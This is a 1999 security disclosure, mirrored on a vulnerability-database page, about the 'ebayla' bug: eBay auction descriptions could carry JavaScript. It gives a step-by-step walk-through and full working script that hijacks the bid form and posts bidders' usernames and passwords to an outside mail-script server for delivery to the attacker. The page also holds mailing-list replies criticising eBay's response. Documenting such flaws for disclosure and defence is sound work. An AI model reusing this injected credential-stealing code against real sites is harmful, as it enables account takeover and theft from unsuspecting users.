Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPacket StormPACKETSTORM:12004
HistoryAug 17, 1999 - 12:00 a.m.

ebayla.txt

1999-08-1700:00:00
Packet Storm
packetstormsecurity.com
34
JSON
`http://www.because-we-can.com/ebayla/  
  
THE EBAYLA BUG AND HOW TO PROTECT YOURSELF  
  
This page describes a security problem that Blue Adept  
<http://www.because-we-can.com/>  
discovered with eBay's <http://www.ebay.com/>   
on-line auctions on March 31,  
1999 (realaudio interview).   
<http://stream.internet.com/Content/inr19990412.ram>  
The security hole allows eBay  
users to easily steal the passwords of other eBay users.  
The exploit involves posting items for bid that include  
malicious javascript code as part of the item's description.  
When an unsuspecting eBay user places a bid on the  
item, the embedded javascript code sends their username  
and password to the malicious user by e-mail. From the   
victim's point of view, nothing unusual seems to have  
occured, so they are unlikely to report/complain to eBay.  
  
Once a malicious user knows the username/password of the   
victim's eBay account, she can assume full control  
of the account, including the ability to:   
  
create new auctions (automtically charging the victim's account)   
place bids in the victim's name,   
retract legitimate bids in the victim's name,   
change the victim's username/password, barring them from eBay,   
associate bogus negative/positive comments with an arbitrary seller,   
prematurely close an auction being run by the victim.   
insert the ebayla code into the victim's auction.  
(The code could be altered to do this automatically, which would   
constitute an ebayla virus).   
  
The security problem is dangerously easy to take advantage of. A  
malicious user needs only to embed the javascript code into their  
description of an item for auction. A walk-through of the exploit  
demonstrates step-by-step how any user can steal eBay passwords. [1]  
  
Blue Adept notified eBay that a 'huge' potential security problem  
existed on March 31,1999 and offered assistance (but as of April 18,  
1999 has only received form letter KMM798062C0KM in reply).  
Information about the ebayla exploit is being made publicly available to  
speed the process of fixing the security hole.   
  
TRY THE EBAYLA BUG DEMO ON YOURSELF!  
  
Visit a working demonstration of this exploit at eBay! The demo   
works with any javascript-enabled browser, such an Netscape or   
Internet Explorer. Users must register (free) with eBay to place bids.  
<http://pages.ebay.com/aw/registration-show.html>  
  
The demo is Blue Adept's own auction infected with eBayla code.  
<http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?ViewItem&item=92085423>   
WARNING! When you bid on this item (or even just review your bid   
without placing it), your username and password will automatically   
be mailed back to because-we-can.com.  
  
  
  
  
HOW TO PROTECT YOURSELF  
  
Unfortunately, the potential security issues at eBay are difficult   
to spot and avoid. If you are unfamiliar with spotting suspect   
javascript in the docsource of an html document, the best way to   
protect yourself may be to avoid using eBay until adequate html   
filters have been implemented.  
  
-----------------------------------------------------------------------------  
  
[1] http://www.because-we-can.com/ebayla/walk.htm  
  
THE EBAYLA BUG WALK-THROUGH  
  
This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal  
usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely  
available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate  
that using only the items listed below, a malicious user can aquire eBay usernames and passwords. (To see a  
more efficient (2 line) version of the code that uses a Perl script, visit the the live demo at eBay.)  
  
INGREDIENTS:   
  
1 Computer with Internet Access   
1 email account   
  
STEP 1:  
Visit ebay.com and register for a free user account.   
<http://pages.ebay.com/aw/registration-show.html>  
  
STEP 2:  
Go to the sellers's area to post an item for auction. When asked to enter the description of the item, post the  
following description, containing the ebayla code. The first line of the script indicates the email address to which  
usernames/passwords are to be sent.   
<http://pages.ebay.com/aw/newitem.html>  
  
1 car, comes with windows. crashes frequently. toy.<hr>  
  
WARNING do not bid on this item!! This auction is a demonstration of the   
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.   
If you place/review a bid, your username and password will be mailed to   
http://www.because-we-can.com.  
  
  
<script>  
recipient = "[email protected]";  
  
function printframeset(place_bid, mailUrl, username, password){  
document.open();   
document.writeln('<script>');  
document.writeln('function go(){');  
document.writeln('top.b.document.open();');  
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');  
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');  
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');  
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');  
document.writeln('top.b.document.writeln("</form>")');  
document.writeln('top.b.document.close();');  
document.writeln('}');  
document.writeln('</scr' + 'ipt>');  
document.writeln('</head>');  
document.writeln('<frameset rows="100%,*" onLoad="go()">');  
document.writeln('<frame name="t" src="' + place_bid + '">');  
document.writeln('<frame name="b" src="">');  
document.writeln('</frameset>');  
document.close();  
}  
  
function urlEncode(inStr) {  
outStr=' '; //not '' for a NS bug!  
for (i=0; i < inStr.length; i++) {  
aChar=inStr.substring (i, i+1);  
switch(aChar){  
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;  
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;  
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;  
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;  
case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;  
case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;  
case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;  
case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;  
case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;  
case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;  
case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;  
case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;  
case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;  
case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;  
default: outStr += aChar;  
}  
}  
return outStr.substring(1, outStr.length);  
}  
  
function newaction(){  
window.document.forms[0].action="javascript:ebayla()";  
}  
  
function ebayla(){  
item = urlEncode(window.document.forms[0].item.value);  
username = urlEncode(window.document.forms[0].userid.value);  
password = urlEncode(window.document.forms[0].pass.value);  
maxbid = urlEncode(window.document.forms[0].maxbid.value);  
  
bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";  
bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username  
+ "&pass=" + password + "&maxbid=" + maxbid;  
place_bid = bid_script + bid_query_string;  
  
mailscript = "http://204.225.88.132/cgi-bin/form1";  
mailUrl = mailscript + '?|' + recipient;  
printframeset(place_bid, mailUrl, username, password);  
}  
  
if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){  
setTimeout("newaction()", 1000);  
}  
  
</script>  
  
  
STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message  
that contains the user's username and password.  
  
Note:  
In the exploit described above, the part of the program that does the  
actual "dirty-work" of mailing the password and username is a  
randomly chosen server-side mailing script we found on the web.  
There are many equivalent and publicly available server-side mailing  
programs that can be used in it's place.  
<http://www.altavista.com/cgi-bin/query?pg=aq&kl=XX&r=%22feedback+form%22+%7C+%22mail+form%22&search=Search&q=&d0=&d1=>  
  
-----------------------------------------------------------------------------  
  
Date: Mon, 19 Apr 1999 14:11:50 -0700  
>From: "Epstein, Jeremy" <[email protected]>  
Subject: Another old-fashioned bug comes back to byte  
  
Wired reports in "'EBayla' Bug Strikes eBay" (see  
http://www.wired.com/news/news/technology/story/19207.html) that eBay users  
can enter an HTML description of the item being auctioned. However, the  
script provided by the seller can also include Javascript, thus allowing the  
seller to create a fairly simple web page that, when accessed by the  
unsuspecting bidder, can capture the bidder's eBay username and password and  
send it to the bidder (or anyone else).  
  
This is a new version of an old bug: if you allow users to specify input  
that can be used by others, make sure there's enough filtering that it can't  
be harmful.  
  
Perhaps the scariest part was the reaction from eBay, as reported by Wired:  
"EBay's senior director of corporate communications characterized the hole  
as an 'occasional byproduct' of the service's user-focused design." eBay  
downplayed the severity of the exploit, noting that "If somebody had indeed  
used your password as well as your username and started bidding on a bunch  
of items, you'd be the first person to be contacted by eBay through e-mail,  
and we'd be able to backtrack on that to make sure that we could take care  
of that situation."   
  
Gee thanks. After it happens, you'll let me know I just bought a velvet  
Elvis and a set of matching pink lawn flamingos :-)  
  
-----------------------------------------------------------------------------  
  
Date: Wed, 21 Apr 1999 17:45:47 -0700  
From: Paul Festa <[email protected]>  
To: [email protected]  
Subject: Re: eBay password stealing with JavaScript  
  
They say they won't:  
  
http://www.news.com/News/Item/0,4,35321,00.html  
  
>>>eBay acknowledged that the JavaScript exploit works, but minimized its  
importance.  
  
"We know it's there, but you have to put it all in perspective," said eBay  
spokesman Kevin Pursglove. "We have a very open environment that lets  
individuals describe what they're selling, and JavaScript is there so  
people can make the best of their abilities to describe an item."<<<  
  
  
  
  
At 08:30 PM 4/20/99 -0600, Michael K. Sanders wrote:  
>Since 'e-commerce' was discussed recently and I didn't find this in  
>the archives, may I direct your attention to:  
>  
><URL:http://because-we-can.com/ebayla/default.htm>  
>  
>It will be interesting if eBay tries to 'filter' JavaScript from their  
>listings to fix this.  
>  
>  
Paul Festa  
reporter, CNET News.com  
(415) 395-7805 ext. 1313  
  
www.news.com  
"Silicon Valley's leading source of up-to-the-minute  
information about the technology business." --New York Times  
  
www.cnet.com  
"A thing called CNET, which is an industry thing." --Bill Gates  
  
`
JSON